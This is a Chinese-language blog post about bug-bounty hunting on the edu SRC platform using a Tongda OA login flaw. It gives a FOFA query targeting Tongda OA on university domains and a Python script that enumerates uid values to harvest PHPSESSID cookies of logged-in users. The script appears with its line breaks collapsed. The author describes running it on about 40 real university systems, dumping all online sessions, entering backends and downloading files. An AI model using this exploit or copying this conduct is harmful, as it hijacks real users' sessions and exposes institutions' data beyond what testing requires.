挖掘厂商SRC-记一次某OA在线登录洞edu不认账

全文小结

1.首先洞没刷到肯定不舒服的，但这种就是比消息，谁拿到的消息快，谁刷的早，就有分，晚的就重复。（好几个3号凌晨通宵刷，我的妈）
2. 向这种在线洞，本地复现材料edu不认。好之为之，40个洞一个没过。
3. 3. fofa找到资产挺多的，但不全，起码有3成不在里面。
4. 4.自己审洞吧，没事别折腾，空欢喜一场。。

3/3号一天早上，需要提早上课，懒洋洋来到教室。

刷刷公众号，看到一个眼前一亮的文章: 某OA系统在线登录漏洞，一看时间是刚发的，突然想起我那可怜的edu rank，感觉这个洞有点说法。
想着回到寝室做一波复现后刷一波，。。。。
回到寝室忘记了。。。睡一觉起来记起还有个这玩意

开始复现，通过作者的解释，得知是登录接口的问题

然后滑到下面看到作者提供了poc。

看到作者没有给附件后**，感觉这个poc可能要调试调试**，然后来了一波复制粘贴，复制到本地后，运行出现各种语法错误，内容大至忘记了，比较多的是 if “RELOGIN” 上面图的第22行，寻思着也没出现缩进，为毛报错了。贴到vscode发现前面的title（）连静态审查都过不了

后面灵光一闪：网页格式既然有问题，那我手工粘贴检查不就行了？？
先导包，导入上面的def title() 函数，很快啊，就做完了，成功遍历。
当时图大致这样

抓包发现还存在一个key_DATA参数，直接复制PHPSESSID改包会失败，说明服务端对key做了验证，只能用脚本跑是否存在漏洞-访问接口（放回一个key和在线的SESSID），访问./general/后台就能登录。。

很快啊，本地做完复现后，就上fofa开始干，
在资产库找到指纹:app=“TDXK-通达OA”
直接 app=“TDXK-通达OA”&& host=".edu.cn"

看到结果挺多了，随便试试这个接口，

噢？这tm不就有洞嘛？果然是0day，在看看别的

看了10来个，发现都存在这个洞，感觉发了。于是乎：构思这种在线洞如何提交漏洞证明：
我的思路是：只要访问接口存在RELOGIN(用户不在线)或者空(用户在线)，
提交一份本地复现的证明，应该就能过。

说干就干，很快啊，就刷了30来个

不得不说，fofa的资产是很全。。最后看了下大概有40来个。
算了一下rank可能70-80，这难道就是0day嘛？

第二天回寝室后，打开edu，看到好几个人也在刷，但没看到我。。

有一种不好的预感。。。。
果然，劳资翻车了

我tm楞了一会，点开详情

这tm在线洞需要用户在线才能算洞，我tm直接蛋疼，记得昨天还交了个在线的

重复，还没给过。。。。
这车翻的我找不着头脑？？

1.那首页上好几页的洞都是登录的？？？
2.为毛他们都过了？？

在群里翻了消息，看到一个公众号发了篇文章，具体是啥忘了，找到个脚本
说是 那个接口/mobile/auth_mobi.php?isAvatar=1&uid=&P_VER=0 这里的uid表示用户在库里的session。我tm心态直接爆炸，我说他们的在线用户怎么来的。

好吧，在心态炸裂后，想着能不能找几个弥补损失，40个洞，能捡漏个2-3个，还是不亏的。
用他的脚本，这里有个坑，url = sys.argv[1] 这里不能放在IDE运行，摸索一会后 python3 poc1.py http://*.edu.cn 大致这样可以跑，

import requests
from bs4 import BeautifulSoup
import sys
import reurl = sys.argv[1]
for i in range(1,10000):try :vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"resp = requests.get(vuln_url)soup = BeautifulSoup(resp.text,'html.parser')if 'RELOGIN' in soup.get_text():print("不存在")else:PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))print('uid='+str(i)+"在线"+"对应的COOKIE值是：PHPSESSID="+str(PHPSESSION[0]))#  breakexcept:break

原代码的意思是找到存在的SESSID就退出，但找了几个洞后，好不容易找到几个在线的，遗憾的是，某哥已经刷过了。。
心想着后台有没啥重要个人信息，交个弱口令也行，所以吧break注释了，这样就会吧全部SESSID在线都跑完。

转了几圈下了几个文件，感觉也没啥利用价值，无奈，放掉这个洞了。。

抱着不甘心的想法，看到edu那几个一块刷的具体，看到好几个刷的比较早，差不多一个人10来个洞，30来rank，没有我想的一把梭情况出现，

做个小结：

1.首先洞没刷到肯定不舒服的，但这种就是比消息，谁拿到的消息快，谁刷的早，就有分，晚的就重复。（好几个3号凌晨通宵刷，我的妈）

2. 向这种在线洞，本地复现材料edu不认。好之为之，40个洞一个没过。

3. 3. fofa找到资产挺多的，但不全，起码有3成不在里面。

4. 4.自己审洞吧，没事别折腾，空欢喜一场。。